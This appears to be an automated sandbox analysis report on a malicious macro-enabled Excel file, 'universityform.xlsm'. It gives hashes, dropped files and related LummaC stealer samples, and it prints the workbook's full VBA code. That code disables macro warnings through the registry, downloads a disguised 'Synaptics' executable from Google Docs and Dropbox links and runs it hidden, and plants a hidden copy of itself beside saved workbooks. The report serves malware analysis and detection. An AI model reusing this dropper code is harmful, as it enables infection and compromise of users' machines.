                                  De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  a0e9f5d64349fb13191bc781f81f42e16QLvb9i.exeGet hashmaliciousLummaCBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  lumma.ps1Get hashmaliciousLummaCBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  Loader.exeGet hashmaliciousLummaCBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  BasesRow.exeGet hashmaliciousLummaCBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                  • 142.250.185.174
                                  • 162.125.66.18
                                  No context
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):118
                                  Entropy (8bit):3.5700810731231707
                                  Encrypted:false
                                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                  MD5:573220372DA4ED487441611079B623CD
                                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                  Category:dropped
                                  Size (bytes):4761
                                  Entropy (8bit):7.945585251880973
                                  Encrypted:false
                                  SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                  MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                  SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                  SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                  SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):3.244406893595737
                                  Encrypted:false
                                  SSDEEP:6:kKUO5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:MLkPlE99SCQl2DUeXJlOA
                                  MD5:80CD6122894A80C6E81AB56B7EA36CCD
                                  SHA1:7E83DD4CC1F698EF59B14487E724727321627579
                                  SHA-256:007A5D0698F4C803E4E1470FFC1D6D64D47F2E206A102BB963FD8B9E454193F0
                                  SHA-512:8EA715DC6F31F69D0ECD34B0A67AEFB9965DF2CEA552358C3602AEFB05319E74142F2A9F57B1D62EAC6CBBBB1A44D12942E4AFFB4C8285F4144484A4DF3C3195
                                  Malicious:false
                                  Reputation:low
                                  Preview:p...... ..........s..Z..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):960
                                  Entropy (8bit):2.712119684852223
                                  Encrypted:false
                                  SSDEEP:24:YIrNvpCHByFQfzLtwcftR/8AJp9WtAZRJ5poIHWPu2qy:YmbCHBTfzLScL8AJtfJ52IH2u2h
                                  MD5:DCDFE441BB603C828CFE2357C06F6F48
                                  SHA1:A5001A2F4647DD7D73BA608938122EAD4E5C840F
                                  SHA-256:6809B32874BEE519D60EA59DB22639279DC57E926C4D157C2B708B144F08EE2A
                                  SHA-512:582F4DE61C0F51F21C79E0E1FA59FD15601247D553F733F5DE5C15117631C5C4FE3CB8F364B3BAC711BC6606018C15F02CB6C03353C0AEBE16947B223FC4A122
                                  Malicious:false
                                  Reputation:low
                                  Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.1.2.2.3.4.3.4.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.3.7.4.6.3.6.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):960
                                  Entropy (8bit):2.712119684852223
                                  Encrypted:false
                                  SSDEEP:24:YIrNvpCHByFQfzLtwcftR/8AJp9WtAZRJ5poIHWPu2qy:YmbCHBTfzLScL8AJtfJ52IH2u2h
                                  MD5:DCDFE441BB603C828CFE2357C06F6F48
                                  SHA1:A5001A2F4647DD7D73BA608938122EAD4E5C840F
                                  SHA-256:6809B32874BEE519D60EA59DB22639279DC57E926C4D157C2B708B144F08EE2A
                                  SHA-512:582F4DE61C0F51F21C79E0E1FA59FD15601247D553F733F5DE5C15117631C5C4FE3CB8F364B3BAC711BC6606018C15F02CB6C03353C0AEBE16947B223FC4A122
                                  Malicious:false
                                  Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.1.2.2.3.4.3.4.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.3.7.4.6.3.6.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):21504
                                  Entropy (8bit):5.320243672900108
                                  Encrypted:false
                                  SSDEEP:192:hK1pkOwpYK3rcd5kM7ffi4UMEBQGOmS+BguAl09J4QfPmSKp4RFi++a+gmmI6tNs:E9ekfn0BxO0P79J7JKp2r+gmml3Yc
                                  MD5:44D22856A592EA130C5C3F99C884D8FC
                                  SHA1:389DC3923FDA95F72B419E2BBFC95D670415F0F5
                                  SHA-256:63A4CB4D12DABBEFA2FCD1F77A9C822F1EBC1EB8561861C85D18C786E9C853EE
                                  SHA-512:AC5FF213742CA39CE37BE63ECB09E896532935CAA5687D22C50F71D892B7BC4196D4CCF65394AA586839415A7386AE057D461F3C2BE7177F912DB10B62569BEA
                                  Malicious:false
                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!......................................................................................................................."...#...$...%...&...'...(...........................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):32768
                                  Entropy (8bit):3.865844544171653
                                  Encrypted:false
                                  SSDEEP:192:x41pkOwpYK3rcd5kM7ffi4UMEBQGOmS+BguAl09J4QfPmSKp4RFi++a+gmmI6tNs:W9ekfn0BxO0P79J7JKp2r+gmml3Yc
                                  MD5:06DC8CF578D0F5E9E7737510F256B89D
                                  SHA1:921145B81A09C15CCA73036315F572118908F130
                                  SHA-256:0AEAA51B6C420FE9B623EB6517F7C1D7EE116D59520E53233648D781052A7FE8
                                  SHA-512:75796CEBB4D6B0C18390BC161F2C912079AE061688BEDE70CAB522C6E5A059510211DC8EFA804BCB6775B8C0D2D3C5FF345FE72A55FC56384747F75A24DC655C
                                  Malicious:false
                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):165
                                  Entropy (8bit):1.3520167401771568
                                  Encrypted:false
                                  SSDEEP:3:xvXFz7f:9Xl
                                  MD5:4B86B2D21B2AC48AD3A1A46FBF1DE4D5
                                  SHA1:2D695349311A0DAF9B77392C04178F1BD99CCEF2
                                  SHA-256:22C126EA43AB2F7C80E19E857C50118A3E08A4A98BE31E2ADCFCA88C8E6C5A5D
                                  SHA-512:FE133E064DAF100FAD21CB4AE44AE573F66A0157A9418538FCE9744B8FB0500478EDE10B9A49E222AA21F14DCB32B384BA1B4D06402D6519EC4E645295F46B76
                                  Malicious:true
                                  Preview:.user ..b.r.o.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  File type:Microsoft Excel 2007+
                                  Entropy (8bit):7.918521920486396
                                  TrID:
                                  • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                                  • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                                  • ZIP compressed archive (8000/1) 8.38%
                                  File name:universityform.xlsm
                                  File size:94'222 bytes
                                  MD5:d04491647385cc373152651890cbc6e0
                                  SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
                                  SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
                                  SHA512:24912a2896f5a05b0d4e73740d27be623043b4ed23a30b50e75584250ecd0d50647eeeaacf6fb9fe9bfe06848e5ad435d647b01e2583796979a3aa77d769cad9
                                  SSDEEP:1536:CguZCa6S5khUI6tHXchBmAXj4znOSjhLM+vGa/M1NIpPkUlB7583fjncFYIIrm0w:Cgugapkhl6tMaPjpM+d/Ms8ULavLcJ/
                                  TLSH:9993F1778724791DE1A92C7BC03F6DB16528120C1F41FA8C6D4AF6CC7EDB6066A4ACC8
                                  File Content Preview:PK..........!.w.6.............[Content_Types].xml ...(.........................................................................................................................................................................................................
                                  Icon Hash:1d356664a4a09519
                                  Document Type:OpenXML
                                  Number of OLE Files:1
                                  Has Summary Info:
                                  Application Name:
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:False
                                  Flash Objects Count:0
                                  Contains VBA Macros:True
                                  Author:RPC1
                                  Last Saved By:Bruno
                                  Create Time:2015-01-15T16:55:01Z
                                  Last Saved Time:2024-12-30T21:22:32Z
                                  Creating Application:Microsoft Excel
                                  Security:0
                                  Thumbnail Scaling Desired:false
                                  Contains Dirty Links:false
                                  Shared Document:false
                                  Changed Hyperlinks:false
                                  Application Version:16.0300
                                  General
                                  Stream Path:VBA/ThisWorkbook
                                  VBA File Name:ThisWorkbook.cls
                                  Stream Size:11862
                                  Data ASCII:. . . . . . . . . . . . . . . 8 . . . / . . . = . . . # . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . @ . . . I 9 P . 7 L S . F ' . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . O . . I - n n y . . . . . . . . . . . . . . . . . . . . . . x . . . . O . . I - n n y . I 9 P . 7 L S . F ' . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 0 . L . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . . . . . .
                                  Data Raw:01 16 01 00 06 00 01 00 00 ec 0a 00 00 e4 00 00 00 38 02 00 00 2f 0b 00 00 3d 0b 00 00 91 23 00 00 0c 00 00 00 01 00 00 00 86 16 cf fa 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 9b c4 49 39 50 08 37 4c 83 53 bc 08 db 46 27 06 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Attribute VB_Name = "ThisWorkbook"
                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                  Attribute VB_GlobalNameSpace = False
                                  Attribute VB_Creatable = False
                                  Attribute VB_PredeclaredId = True
                                  Attribute VB_Exposed = True
                                  Attribute VB_TemplateDerived = False
                                  Attribute VB_Customizable = True
                                  Dim SheetsChanged As Boolean
                                  Dim SheetCount As Integer
                                  
                                  Private Sub Workbook_Open()
                                    Dim i As Integer
                                    For i = 1 To ActiveWorkbook.Sheets.Count
                                      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                    Next i
                                    
                                    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
                                    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
                                    
                                    Application.DisplayAlerts = False
                                    SheetCount = Worksheets.Count
                                    
                                    Call MPS
                                    
                                    ActiveWorkbook.Sheets(1).Select
                                    SheetsChanged = False
                                  End Sub
                                  
                                  Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                    If Not SheetsChanged Then
                                      ActiveWorkbook.Saved = True
                                    End If
                                  End Sub
                                  
                                  Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
                                    SheetsChanged = True
                                  End Sub
                                  
                                  Private Sub Workbook_NewSheet(ByVal Sh As Object)
                                    SheetsChanged = True
                                  End Sub
                                  
                                  Private Sub Workbook_SheetActivate(ByVal Sh As Object)
                                    If ActiveWorkbook.Sheets.Count <> SheetCount Then
                                      SheetsChanged = True
                                      SheetCount = ActiveWorkbook.Sheets.Count
                                    End If
                                  End Sub
                                  
                                  Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
                                    Dim i As Integer
                                    Dim AIndex As Integer
                                    Dim FName
                                  
                                    AIndex = ActiveWorkbook.ActiveSheet.Index
                                  
                                    If SaveAsUI = False Then
                                      Cancel = True
                                      Application.EnableEvents = False
                                      Application.ScreenUpdating = False
                                      
                                      For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                        ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                      Next i
                                      ActiveWorkbook.Save
                                        
                                      For i = 1 To ActiveWorkbook.Sheets.Count
                                        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                      Next i
                                      ActiveWorkbook.Sheets(AIndex).Select
                                      SheetsChanged = False
                                      
                                      Application.ScreenUpdating = True
                                      Application.EnableEvents = True
                                    Else
                                      Cancel = True
                                      Application.EnableEvents = False
                                      Application.ScreenUpdating = False
                                      
                                      For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                        ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                      Next i
                                      
                                      FName = Application.GetSaveAsFilename(fileFilter:="Excel alma Kitab (*.xlsm), *.xlsm")
                                      If FName <> False Then
                                        ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
                                        SaveAsInj ActiveWorkbook.Path
                                      End If
                                      
                                      For i = 1 To ActiveWorkbook.Sheets.Count
                                        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                      Next i
                                      ActiveWorkbook.Sheets(AIndex).Select
                                      SheetsChanged = False
                                          
                                      Application.ScreenUpdating = True
                                      Application.EnableEvents = True
                                    End If
                                  End Sub
                                  
                                  Sub SaveAsInj(DIR As String)
                                    Dim FSO As Object
                                    Dim FN As String
                                    
                                    Set FSO = CreateObject("scripting.filesystemobject")
                                    FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                    
                                    If FSO.FileExists(FN) Then
                                      If Not FSO.FileExists(DIR & "\~$cache1") Then
                                        FileCopy FN, DIR & "\~$cache1"
                                      End If
                                      SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
                                    End If
                                  End Sub
                                  
                                  Function RegKeyRead(i_RegKey As String) As String
                                    Dim myWS As Object
                                  
                                    On Error Resume Next
                                    Set myWS = CreateObject("WScript.Shell")
                                    RegKeyRead = myWS.RegRead(i_RegKey)
                                  End Function
                                  
                                  Function RegKeyExists(i_RegKey As String) As Boolean
                                  Dim myWS As Object
                                  
                                    On Error GoTo ErrorHandler
                                    Set myWS = CreateObject("WScript.Shell")
                                    myWS.RegRead i_RegKey
                                    RegKeyExists = True
                                    Exit Function
                                    
                                  ErrorHandler:
                                    RegKeyExists = False
                                  End Function
                                  
                                  Sub RegKeySave(i_RegKey As String,                i_Value As String,       Optional i_Type As String = "REG_SZ")
                                  Dim myWS As Object
                                  
                                    Set myWS = CreateObject("WScript.Shell")
                                    myWS.RegWrite i_RegKey, i_Value, i_Type
                                  End Sub
                                  
                                  Sub MPS()
                                    Dim FSO As Object
                                    Dim FP(1 To 3), TMP, URL(1 To 3) As String
                                    
                                    Set FSO = CreateObject("scripting.filesystemobject")
                                    FP(1) = ActiveWorkbook.Path & "\~$cache1"
                                    FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
                                  
                                    URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                                    URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                    URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                    TMP = Environ("Temp") & "\~$cache1.exe"
                                    
                                    If FSO.FileExists(FP(1)) Then
                                      If Not FSO.FileExists(TMP) Then
                                        FileCopy FP(1), TMP
                                      End If
                                      Shell TMP, vbHide
                                    ElseIf FSO.FileExists(FP(2)) Then
                                      If Not FSO.FileExists(TMP) Then
                                        FileCopy FP(2), TMP
                                      End If
                                      Shell TMP, vbHide
                                    Else
                                      If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                        Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                      ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                        Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                      ElseIf Not FSO.FileExists(TMP) Then
                                        If FDW((URL(1)), (TMP)) Then
                                        ElseIf FDW((URL(2)), (TMP)) Then
                                        ElseIf FDW((URL(3)), (TMP)) Then
                                        End If
                                        If FSO.FileExists(TMP) Then
                                          Shell TMP, vbHide
                                        End If
                                      Else
                                        Shell TMP, vbHide
                                      End If
                                      
                                    End If
                                    
                                  End Sub
                                  
                                  Function FDW(MYU, NMA As String) As Boolean
                                    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                    If WinHttpReq Is Nothing Then
                                      Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                    End If
                                  
                                    WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                                    WinHttpReq.Option(6) = AllowRedirects
                                    WinHttpReq.Open "GET", MYU, False
                                    WinHttpReq.Send
                                    
                                    If (WinHttpReq.Status = 200) Then
                                      If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
                                        FDW = True
                                        Set oStream = CreateObject("ADODB.Stream")
                                        oStream.Open
                                        oStream.Type = 1
                                        oStream.Write WinHttpReq.ResponseBody
                                        oStream.SaveToFile (NMA)
                                        oStream.Close
                                      Else
                                         FDW = False
                                      End If
                                    Else
                                      FDW = False
                                    End If
                                  End Function
                                  
                                  

                                  General
                                  Stream Path:PROJECT
                                  CLSID:
                                  File Type:ASCII text, with CRLF line terminators
                                  Stream Size:465
                                  Entropy:5.186031070026395
                                  Base64 Encoded:True
                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 C 4 E E 0 B 6 6 0 0 6 6 4 0 6 6 4 0 3 6 9 0 3 6 9 " . . D P B = " 9 8 9 A 3 4 5 B 5 1 5 B 5 1 A 4 A F 5 C 5 1 3 C 7 7 3 5 C E 9 A 0 A 4 9 5 E A 4 B 2 9 F 4 2 0 B 0 4 C 5 D 5
                                  Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
                                  General
                                  Stream Path:PROJECTwm
                                  CLSID:
                                  File Type:data
                                  Stream Size:41
                                  Entropy:2.7478777776526524
                                  Base64 Encoded:False
                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . . .
                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00
                                  General
                                  Stream Path:VBA/_VBA_PROJECT
                                  CLSID:
                                  File Type:data
                                  Stream Size:3502
                                  Entropy:4.951751659616407
                                  Base64 Encoded:False
                                  Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                                  Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                  General
                                  Stream Path:VBA/__SRP_0
                                  CLSID:
                                  File Type:data
                                  Stream Size:1652
                                  Entropy:4.357408478574171
                                  Base64 Encoded:False
                                  Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h ) h * O r \\ . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . .
